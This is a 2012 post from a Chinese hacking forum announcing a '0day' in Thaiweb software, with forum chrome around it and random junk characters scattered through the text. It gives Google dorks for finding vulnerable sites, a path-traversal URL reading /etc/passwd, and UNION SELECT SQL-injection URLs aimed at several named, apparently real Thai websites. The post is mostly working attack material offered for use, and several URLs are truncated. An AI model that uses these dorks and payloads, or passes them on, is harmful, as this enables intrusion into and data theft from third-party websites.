找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1966|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
Google之:+ t5 z" e! @$ r8 T- J2 d7 M
$ Q. ~) L  g( i( I+ M) A4 i
intext:powered by Thaiweb
+ z# J: k0 j* X4 U! a' h0 i
. p, q3 @* f/ D  v' rinurl:index.php?page=board.php; h: I( _8 W8 ]6 f

5 k1 T+ @5 |& O' q  l% A& X6 H1 Y
" t7 d, W  G& x' l1 t/ R" |2 }1 w5 K2 i# T/ p2 F' f
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
7 C1 f" K; c1 j* J
3 h" m2 p& p' o5 ~( i: U* K0 D4 O
: L3 h4 q  c1 m! \
% F+ I( Z: u& N7 x3 h. W( O. }利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'- x- w4 T$ Q  X% `" I# D' U6 H

1 T: Q3 ~2 n( U: a4 P 5 @8 R9 l. p% v! M( d
% x, Y& G" Z9 t9 f9 m" q
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
- _9 j7 }# t  s) l4 B/ z6 U" d' E0 u3 e7 k2 p: o( f
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--  j) k6 \& G0 P: w
& L4 l' [: [) b4 Y
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--5 O/ o4 t& J  P; j. G. {4 Z6 Y% q7 b
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表